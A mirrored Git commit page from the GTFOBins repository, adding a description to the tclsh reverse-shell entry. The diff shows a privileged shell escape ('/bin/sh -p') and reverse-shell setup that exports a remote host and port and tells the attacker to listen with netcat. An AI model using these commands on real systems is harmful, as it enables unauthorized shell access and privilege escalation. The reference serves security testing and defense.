mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Add tclsh reverse shell description
This commit is contained in:
parent
24a7c20324
commit
5f5598b1c3
@ -13,7 +13,7 @@ functions:
|
|||||||
./tclsh
|
./tclsh
|
||||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description:
|
- description: Run `nc -l -p 8000` to receive the shell on the other end.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=10.0.0.1
|
export RHOST=10.0.0.1
|
||||||
export RPORT=8000
|
export RPORT=8000
|
||||||
|
Loading…
Reference in New Issue
Block a user